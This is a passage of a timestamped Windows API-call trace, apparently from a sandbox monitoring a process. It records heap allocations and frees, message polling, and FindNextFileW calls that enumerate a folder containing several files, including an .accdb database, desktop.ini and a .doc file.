wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2280 [0073.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ccec8 [0073.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2160 [0073.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ccec8 | out: hHeap=0x1780000) returned 1 [0073.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0073.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2280 | out: hHeap=0x1780000) returned 1 [0073.818] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0073.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2170 [0073.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2280 [0073.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d68 [0073.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ccec8 [0073.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21a0 [0073.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ccec8 | out: hHeap=0x1780000) returned 1 [0073.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0073.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2280 | out: hHeap=0x1780000) returned 1 [0073.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0073.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2170 | out: hHeap=0x1780000) returned 1 [0073.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0073.819] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0073.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e48 [0073.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2280 [0073.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e48 [0073.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e18 [0073.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e18 | out: hHeap=0x1780000) returned 1 [0073.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c98 [0073.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2170 [0073.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391578 [0073.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c98 | out: hHeap=0x1780000) returned 1 [0073.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0073.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2280 | out: hHeap=0x1780000) returned 1 [0073.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0073.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1b0) returned 0x43ccec8 [0073.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1b22250 | out: hHeap=0x1780000) returned 1 [0073.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391578 | out: hHeap=0x1780000) returned 1 [0073.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2170 | out: hHeap=0x1780000) returned 1 [0073.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e48 | out: hHeap=0x1780000) returned 1 [0073.819] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0073.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0073.819] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0073.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbd0 [0073.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c98 [0073.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2170 [0073.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2170 | out: hHeap=0x1780000) returned 1 [0073.820] FindNextFileW (in: hFindFile=0x41ac240, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8bbbd340, ftCreationTime.dwHighDateTime=0x1d5e57e, ftLastAccessTime.dwLowDateTime=0xb7031e40, ftLastAccessTime.dwHighDateTime=0x1d5e0f2, ftLastWriteTime.dwLowDateTime=0xb7031e40, ftLastWriteTime.dwHighDateTime=0x1d5e0f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="D2Y3tG", cAlternateFileName="")) returned 1 [0073.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0073.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0073.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2170 [0073.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c98 | out: hHeap=0x1780000) returned 1 [0073.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbd0 | out: hHeap=0x1780000) returned 1 [0073.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0073.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0073.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2170 | out: hHeap=0x1780000) returned 1 [0073.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0073.820] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2280 [0073.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9018 [0073.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2160 [0073.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9018 | out: hHeap=0x1780000) returned 1 [0073.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0073.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2280 | out: hHeap=0x1780000) returned 1 [0073.820] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0073.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2170 [0073.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21a0 [0073.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d88 [0073.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9018 [0073.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2280 [0073.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9018 | out: hHeap=0x1780000) returned 1 [0073.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2280 | out: hHeap=0x1780000) returned 1 [0073.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0073.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0073.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2170 | out: hHeap=0x1780000) returned 1 [0073.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0073.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0073.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9bc0 [0073.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9e18 [0073.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bc0 | out: hHeap=0x1780000) returned 1 [0073.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e18 | out: hHeap=0x1780000) returned 1 [0073.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0073.821] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0073.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0073.821] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2280 [0073.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf928 [0073.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0073.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0073.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0073.823] FindNextFileW (in: hFindFile=0x41ac240, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3340555c, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x3396299d, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x9daec75b, ftLastWriteTime.dwHighDateTime=0x1d3aafb, nFileSizeHigh=0x0, nFileSizeLow=0x55000, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="Database1.accdb", cAlternateFileName="DATABA~1.ACC")) returned 1 [0073.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e48 [0073.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0073.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2160 [0073.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0073.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf928 | out: hHeap=0x1780000) returned 1 [0073.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2280 | out: hHeap=0x1780000) returned 1 [0073.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0073.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0073.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e48 | out: hHeap=0x1780000) returned 1 [0073.823] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0073.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9018 [0073.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2280 [0073.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9018 | out: hHeap=0x1780000) returned 1 [0073.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2280 | out: hHeap=0x1780000) returned 1 [0073.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0073.824] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21a0 [0073.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0073.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2170 [0073.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0073.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9018 [0073.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2280 [0073.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9018 | out: hHeap=0x1780000) returned 1 [0073.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2280 | out: hHeap=0x1780000) returned 1 [0073.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2170 | out: hHeap=0x1780000) returned 1 [0073.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0073.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0073.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0073.824] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2280 [0073.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0073.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2170 [0073.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f88 [0073.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c38 [0073.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c38 | out: hHeap=0x1780000) returned 1 [0073.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e18 [0073.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2160 [0073.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391578 [0073.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e18 | out: hHeap=0x1780000) returned 1 [0073.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f88 | out: hHeap=0x1780000) returned 1 [0073.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2170 | out: hHeap=0x1780000) returned 1 [0073.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2280 | out: hHeap=0x1780000) returned 1 [0073.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391578 | out: hHeap=0x1780000) returned 1 [0073.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0073.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0073.825] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2280 [0073.825] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2280 | out: hHeap=0x1780000) returned 1 [0073.825] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2280 [0073.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0073.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e48 [0073.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0073.825] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0073.825] FindNextFileW (in: hFindFile=0x41ac240, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x440c5760, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x440c5760, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce494f1d, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0073.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0073.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0073.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2160 [0073.825] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e48 | out: hHeap=0x1780000) returned 1 [0073.825] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0073.825] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2280 | out: hHeap=0x1780000) returned 1 [0073.825] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0073.825] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0073.825] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0073.825] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2280 [0073.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9018 [0073.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2160 [0073.825] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9018 | out: hHeap=0x1780000) returned 1 [0073.825] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0073.825] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2280 | out: hHeap=0x1780000) returned 1 [0073.825] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2280 [0073.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0073.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2170 [0073.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d88 [0073.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9018 [0073.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21a0 [0073.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9018 | out: hHeap=0x1780000) returned 1 [0073.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0073.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2170 | out: hHeap=0x1780000) returned 1 [0073.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0073.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0073.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2280 | out: hHeap=0x1780000) returned 1 [0073.826] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0073.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0073.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2280 [0073.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d88 [0073.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0073.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0073.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0073.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2170 [0073.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0073.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0073.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0073.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2280 | out: hHeap=0x1780000) returned 1 [0073.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0073.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0073.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2170 | out: hHeap=0x1780000) returned 1 [0073.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c20 | out: hHeap=0x1780000) returned 1 [0073.826] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2280 [0073.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2280 | out: hHeap=0x1780000) returned 1 [0073.826] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0073.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0073.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0073.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21a0 [0073.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0073.827] FindNextFileW (in: hFindFile=0x41ac240, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xceb43d90, ftCreationTime.dwHighDateTime=0x1d5e94d, ftLastAccessTime.dwLowDateTime=0x547f2530, ftLastAccessTime.dwHighDateTime=0x1d5e1fa, ftLastWriteTime.dwLowDateTime=0x547f2530, ftLastWriteTime.dwHighDateTime=0x1d5e1fa, nFileSizeHigh=0x0, nFileSizeLow=0xd46d, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="eJ Z0ZcCpMN.doc", cAlternateFileName="EJZ0ZC~1.DOC")) returned 1 [0073.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c98 [0073.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0073.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2280 [0073.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0073.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0073.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0073.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0073.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2280 | out: hHeap=0x1780000) returned 1 [0073.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c98 | out: hHeap=0x1780000) returned 1 [0073.827] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 